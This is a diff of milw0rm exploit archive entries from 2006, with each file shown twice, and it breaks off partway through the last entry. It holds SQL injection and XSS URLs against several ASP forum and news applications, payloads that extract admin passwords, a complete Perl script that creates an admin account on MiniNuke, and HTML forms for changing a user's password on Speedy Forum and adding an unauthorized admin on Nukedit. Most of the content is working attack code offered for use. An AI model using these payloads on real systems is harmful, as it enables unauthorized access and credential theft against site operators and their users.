http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
Örnek:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
Ac.klama:
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.
# milw0rm.com [2006-05-26]
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;
SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
TURKISH
# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory"
# Aç... Bulan : ajann
# Aç.k bulunan dosyalar;
SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
Örnek:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
Örnek:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
Ac.klama:
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.
# milw0rm.com [2006-05-26]

View file

@ -1,7 +1,7 @@
# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Exploit Example:
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt
# milw0rm.com [2006-05-27]
# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Exploit Example:
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt
# milw0rm.com [2006-05-27]

View file

@ -1,204 +1,204 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=31
#Usage: mini.pl <host> <path> <user> <pass> <mail>
use IO::Socket;
if(@ARGV != 5) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-31\r\n";
print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n";
print "- <user> -> Desired username to create ex: h4x0r\r\n";
print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n";
print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$mnserver = $ARGV[0];
$mnserver =~ s/(http:\/\/)//eg;
$mnhost = "http://".$mnserver;
$mndir = $ARGV[1];
$mnuser = $ARGV[2];
$mnpass = $ARGV[3];
$mnmail = $ARGV[4];
$mnport = "80";
#Sending data...
header();
print "- Trying to connect: $mnserver\r\n";
getsession();
}
sub getsession ()
{
print "- Getting session for register...\r\n";
$mnstar = "membership.asp?action=new";
$mnsreq = $mnhost.$mndir.$mnstar;
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mns "GET $mnsreq HTTP/1.1\n";
print $mns "Accept: */*\n";
print $mns "Referer: $mnhost\n";
print $mns "Accept-Language: tr\n";
print $mns "User-Agent: NukeZilla\n";
print $mns "Cache-Control: no-cache\n";
print $mns "Host: $mnserver\n";
print $mns "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$mns>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
}
#if you are here...
die "- Exploit failed\r\n";
}
sub doregister ()
{
close($mns);
$mntar = "membership.asp?action=register";
$mnreq = $mnhost.$mndir.$mntar;
print "- Session getting done\r\n";
print "- Lets create our user...\r\n";
$mndata = "kuladi=".$mnuser;
$mndata.= "&password=".$mnpass;
$mndata.= "&email=".$mnmail;
$mndata.= "&isim=h4x0r";
$mndata.= "&g_soru=whooooo";
$mndata.= "&g_cevap=h4x0rs";
$mndata.= "&icq=1";
$mndata.= "&msn=1";
$mndata.= "&aim=1";
$mndata.= "&sehir=1";
$mndata.= "&meslek=1";
$mndata.= "&cinsiyet=b";
$mndata.= "&yas_1=1";
$mndata.= "&yas_2=1";
$mndata.= "&yas_3=1920";
$mndata.= "&web=http://www.milw0rm.com";
$mndata.= "&imza=h4x0r";
$mndata.= "&mavatar=IMAGES/avatars/1.gif";
$mndata.= "&security_code=".$mngvn;
$mndata.= "&mail_goster=on";
$mndatalen = length($mndata);
$mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mn "POST $mnreq HTTP/1.1\r\n";
print $mn "Accept: */*\r\n";
print $mn "Referer: $mnhost\r\n";
print $mn "Accept-Language: tr\r\n";
print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
print $mn "Accept-Encoding: gzip, deflate\r\n";
print $mn "User-Agent: NukeZilla\r\n";
print $mn "Cookie: $mncookie\r\n";
print $mn "Host: $mnserver\r\n";
print $mn "Content-length: $mndatalen\r\n";
print $mn "Connection: Keep-Alive\r\n";
print $mn "Cache-Control: no-cache\r\n\r\n";
print $mn $mndata;
print $mn "\r\n\r\n";
while ($answer = <$mn>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Creating user has been done...\r\n";
print "- Loginning in to user...\r\n";
dologin();
}
}
#if you are here...
die "- Exploit failed\r\n";
}
sub dologin ()
{
close ($mn);
$mnltar = "enter.asp";
$mnlreq = $mnhost.$mndir.$mnltar;
$mnldata = "kuladi=".$mnuser;
$mnldata.= "&password=".$mnpass;
$mnldata.= "&guvenlik=423412";
$mnldata.= "&gguvenlik=423412";
$mnldatalen = length($mnldata);
$mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnl "POST $mnlreq HTTP/1.1\r\n";
print $mnl "Accept: */*\r\n";
print $mnl "Referer: $mnhost\r\n";
print $mnl "Accept-Language: tr\r\n";
print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnl "Accept-Encoding: gzip, deflate\r\n";
print $mnl "User-Agent: NukeZilla\r\n";
print $mnl "Host: $mnserver\r\n";
print $mnl "Content-length: $mnldatalen\r\n";
print $mnl "Connection: Keep-Alive\r\n";
print $mnl "Cache-Control: no-cache\r\n\r\n";
print $mnl $mnldata;
print $mnl "\r\n\r\n";
while ($answer = <$mnl>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
if ($answer =~ /Cache-control:/) { doadmin(); }
}
#if you are here...
die "- Exploit failed\r\n";
}
sub doadmin ()
{
close($mnl);
print "- Editing profile..\r\n";
$mnptar = "Your_Account.asp?op=UpdateProfile";
$mnpreq = $mnhost.$mndir.$mnptar;
$mnpdata.= "email=".$mnmail;
$mnpdata.= "&isim=h4x0r";
$mnpdata.= "&g_soru=whooooo";
$mnpdata.= "&g_cevap=h4x0rs";
$mnpdata.= "&icq=1";
$mnpdata.= "&msn=1";
$mnpdata.= "&aim=1";
$mnpdata.= "&sehir=1";
$mnpdata.= "&meslek=1";
$mnpdata.= "&cinsiyet=b";
$mnpdata.= "&yas_1=1";
$mnpdata.= "&yas_2=1";
$mnpdata.= "&yas_3=1920',seviye='1";
$mnpdata.= "&web=http://www.milw0rm.com";
$mnpdata.= "&imza=h4x0r";
$mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
$mnpdata.= "&mail_goster=on";
$mnpdatalen = length($mnpdata);
$mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnp "POST $mnpreq HTTP/1.1\r\n";
print $mnp "Accept: */*\r\n";
print $mnp "Referer: $mnhost\r\n";
print $mnp "Accept-Language: tr\r\n";
print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnp "Accept-Encoding: gzip, deflate\r\n";
print $mnp "User-Agent: NukeZilla\r\n";
print $mnp "Cookie: $mnlcookie\r\n";
print $mnp "Host: $mnserver\r\n";
print $mnp "Content-length: $mnpdatalen\r\n";
print $mnp "Connection: Keep-Alive\r\n";
print $mnp "Cache-Control: no-cache\r\n\r\n";
print $mnp $mnpdata;
print $mn "\r\n\r\n";
while ($answer = <$mnp>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Editing profile been done...\r\n";
print "- Exploiting finished succesfully\r\n";
print "- Your username $mnuser has been created as admin\r\n";
print "- You can login with password $mnpass on $mnlreq\r\n";
exit();
}
if ($answer =~ /Üyeler Açýktýr/) {
print "- Exploit failed\r\n";
exit();
}
}
#if you are here...
die "- Exploit failed\r\n";
}
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-27]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=31
#Usage: mini.pl <host> <path> <user> <pass> <mail>
use IO::Socket;
if(@ARGV != 5) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-31\r\n";
print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n";
print "- <user> -> Desired username to create ex: h4x0r\r\n";
print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n";
print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$mnserver = $ARGV[0];
$mnserver =~ s/(http:\/\/)//eg;
$mnhost = "http://".$mnserver;
$mndir = $ARGV[1];
$mnuser = $ARGV[2];
$mnpass = $ARGV[3];
$mnmail = $ARGV[4];
$mnport = "80";
#Sending data...
header();
print "- Trying to connect: $mnserver\r\n";
getsession();
}
sub getsession ()
{
print "- Getting session for register...\r\n";
$mnstar = "membership.asp?action=new";
$mnsreq = $mnhost.$mndir.$mnstar;
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mns "GET $mnsreq HTTP/1.1\n";
print $mns "Accept: */*\n";
print $mns "Referer: $mnhost\n";
print $mns "Accept-Language: tr\n";
print $mns "User-Agent: NukeZilla\n";
print $mns "Cache-Control: no-cache\n";
print $mns "Host: $mnserver\n";
print $mns "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$mns>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
}
#if you are here...
die "- Exploit failed\r\n";
}
sub doregister ()
{
close($mns);
$mntar = "membership.asp?action=register";
$mnreq = $mnhost.$mndir.$mntar;
print "- Session getting done\r\n";
print "- Lets create our user...\r\n";
$mndata = "kuladi=".$mnuser;
$mndata.= "&password=".$mnpass;
$mndata.= "&email=".$mnmail;
$mndata.= "&isim=h4x0r";
$mndata.= "&g_soru=whooooo";
$mndata.= "&g_cevap=h4x0rs";
$mndata.= "&icq=1";
$mndata.= "&msn=1";
$mndata.= "&aim=1";
$mndata.= "&sehir=1";
$mndata.= "&meslek=1";
$mndata.= "&cinsiyet=b";
$mndata.= "&yas_1=1";
$mndata.= "&yas_2=1";
$mndata.= "&yas_3=1920";
$mndata.= "&web=http://www.milw0rm.com";
$mndata.= "&imza=h4x0r";
$mndata.= "&mavatar=IMAGES/avatars/1.gif";
$mndata.= "&security_code=".$mngvn;
$mndata.= "&mail_goster=on";
$mndatalen = length($mndata);
$mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mn "POST $mnreq HTTP/1.1\r\n";
print $mn "Accept: */*\r\n";
print $mn "Referer: $mnhost\r\n";
print $mn "Accept-Language: tr\r\n";
print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
print $mn "Accept-Encoding: gzip, deflate\r\n";
print $mn "User-Agent: NukeZilla\r\n";
print $mn "Cookie: $mncookie\r\n";
print $mn "Host: $mnserver\r\n";
print $mn "Content-length: $mndatalen\r\n";
print $mn "Connection: Keep-Alive\r\n";
print $mn "Cache-Control: no-cache\r\n\r\n";
print $mn $mndata;
print $mn "\r\n\r\n";
while ($answer = <$mn>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Creating user has been done...\r\n";
print "- Loginning in to user...\r\n";
dologin();
}
}
#if you are here...
die "- Exploit failed\r\n";
}
sub dologin ()
{
close ($mn);
$mnltar = "enter.asp";
$mnlreq = $mnhost.$mndir.$mnltar;
$mnldata = "kuladi=".$mnuser;
$mnldata.= "&password=".$mnpass;
$mnldata.= "&guvenlik=423412";
$mnldata.= "&gguvenlik=423412";
$mnldatalen = length($mnldata);
$mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnl "POST $mnlreq HTTP/1.1\r\n";
print $mnl "Accept: */*\r\n";
print $mnl "Referer: $mnhost\r\n";
print $mnl "Accept-Language: tr\r\n";
print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnl "Accept-Encoding: gzip, deflate\r\n";
print $mnl "User-Agent: NukeZilla\r\n";
print $mnl "Host: $mnserver\r\n";
print $mnl "Content-length: $mnldatalen\r\n";
print $mnl "Connection: Keep-Alive\r\n";
print $mnl "Cache-Control: no-cache\r\n\r\n";
print $mnl $mnldata;
print $mnl "\r\n\r\n";
while ($answer = <$mnl>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
if ($answer =~ /Cache-control:/) { doadmin(); }
}
#if you are here...
die "- Exploit failed\r\n";
}
sub doadmin ()
{
close($mnl);
print "- Editing profile..\r\n";
$mnptar = "Your_Account.asp?op=UpdateProfile";
$mnpreq = $mnhost.$mndir.$mnptar;
$mnpdata.= "email=".$mnmail;
$mnpdata.= "&isim=h4x0r";
$mnpdata.= "&g_soru=whooooo";
$mnpdata.= "&g_cevap=h4x0rs";
$mnpdata.= "&icq=1";
$mnpdata.= "&msn=1";
$mnpdata.= "&aim=1";
$mnpdata.= "&sehir=1";
$mnpdata.= "&meslek=1";
$mnpdata.= "&cinsiyet=b";
$mnpdata.= "&yas_1=1";
$mnpdata.= "&yas_2=1";
$mnpdata.= "&yas_3=1920',seviye='1";
$mnpdata.= "&web=http://www.milw0rm.com";
$mnpdata.= "&imza=h4x0r";
$mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
$mnpdata.= "&mail_goster=on";
$mnpdatalen = length($mnpdata);
$mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnp "POST $mnpreq HTTP/1.1\r\n";
print $mnp "Accept: */*\r\n";
print $mnp "Referer: $mnhost\r\n";
print $mnp "Accept-Language: tr\r\n";
print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnp "Accept-Encoding: gzip, deflate\r\n";
print $mnp "User-Agent: NukeZilla\r\n";
print $mnp "Cookie: $mnlcookie\r\n";
print $mnp "Host: $mnserver\r\n";
print $mnp "Content-length: $mnpdatalen\r\n";
print $mnp "Connection: Keep-Alive\r\n";
print $mnp "Cache-Control: no-cache\r\n\r\n";
print $mnp $mnpdata;
print $mn "\r\n\r\n";
while ($answer = <$mnp>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Editing profile been done...\r\n";
print "- Exploiting finished succesfully\r\n";
print "- Your username $mnuser has been created as admin\r\n";
print "- You can login with password $mnpass on $mnlreq\r\n";
exit();
}
if ($answer =~ /Üyeler Açýktýr/) {
print "- Exploit failed\r\n";
exit();
}
}
#if you are here...
die "- Exploit failed\r\n";
}
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-27]

View file

@ -1,25 +1,25 @@
Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on Enigma Haber <= 4.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
http://[site]/enigmadir/yazdir.asp?hid=SQL
http://[site]/enigmadir/yorum.asp?hid=SQL
http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
http://[site]/enigmadir/haber_devam.asp?id=SQL
Examples in the below needs admin rights.
http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28]
Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on Enigma Haber <= 4.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
http://[site]/enigmadir/yazdir.asp?hid=SQL
http://[site]/enigmadir/yorum.asp?hid=SQL
http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
http://[site]/enigmadir/haber_devam.asp?id=SQL
Examples in the below needs admin rights.
http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28]

View file

@ -1,15 +1,15 @@
ASPSitem <= 2.0 Multiple Vulnerabilities.
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on ASPSitem <= 2.0.
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
id%20like%201
with this example remote attacker can leak userid 1's login information from database.
Read others private messages ->
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28]
ASPSitem <= 2.0 Multiple Vulnerabilities.
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on ASPSitem <= 2.0.
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
id%20like%201
with this example remote attacker can leak userid 1's login information from database.
Read others private messages ->
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28]

View file

@ -1,69 +1,69 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>
<div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User
Name
: </b></font>
<input type="text" name="name" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname
Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Mail
: </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Ýd
: </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country :
</b>
</font>
<select size="1" name="country">
<option value="0">Choose Country</option>
<option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example:
Turkey</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type="text" name="password" value="Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type="text" name="passwordre" value="Re Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>Form Action :
</b>
</font>
<input type="text" name="adres" value="profileupdate.asp" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>
<p>
<input type="submit" name="Submit" value="Change"> </p>
<br>
</form>
</div></body></html>
# milw0rm.com [2006-05-29]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>
<div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User
Name
: </b></font>
<input type="text" name="name" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname
Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Mail
: </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Ýd
: </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country :
</b>
</font>
<select size="1" name="country">
<option value="0">Choose Country</option>
<option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example:
Turkey</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type="text" name="password" value="Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type="text" name="passwordre" value="Re Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>Form Action :
</b>
</font>
<input type="text" name="adres" value="profileupdate.asp" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>
<p>
<input type="submit" name="Submit" value="Change"> </p>
<br>
</form>
</div></body></html>
# milw0rm.com [2006-05-29]

View file

@ -1,43 +1,43 @@
################ KAPDA - Security Science Researchers Institute #################
#Advisory : http://www.kapda.ir/advisory-337.html
#Vendor : http://www.nukedit.com/
#What is : Nukedit is a Free Content Management
#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable!
#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir
#Vulnerabale versions : <= 4.9.6
#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com
#Solution : update to new version of nukedit .
#Change "http://victim.com/nukedit/utilities/register.asp"
################ KAPDA - Security Science Researchers Institute #################
<html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head>
<body>
<font face="Verdana" Size="1"><br>
Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br>
Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br>
Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br>
Fill the blank and submit . After that login with your email ! + your password .<p>
<form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp">
<input type="hidden" name="action" value="addDB"></p>
<br><br><br>Username :<input type="text" name="username" size="50" style="float: left; font-family: Verdana; font-size: 7pt">
<input type="hidden" name="company" size="30" value="MSN">
<input type="hidden" name="Url" size="30" value="http://www.lol.ir">
<input type="hidden" name="address" size="30" value="System32">
<input type="hidden" name="county" size="30" value="00">
<input type="hidden" name="zip" size="10" value="12345">
<input type="hidden" name="country" value="XPL">
<input type="hidden" name="phone" size="15" value="12345678">
<input type="hidden" name="fax" size="15" value="87654321">
<br><br><br>Your E-mail : <input type="text" name="email" size="30" style="float: left; font-family: Verdana; font-size: 7pt">
<br><br><br>Your Password : <input type="password" name="password" size="20" style="float: left; font-family: Verdana; font-size: 7pt">
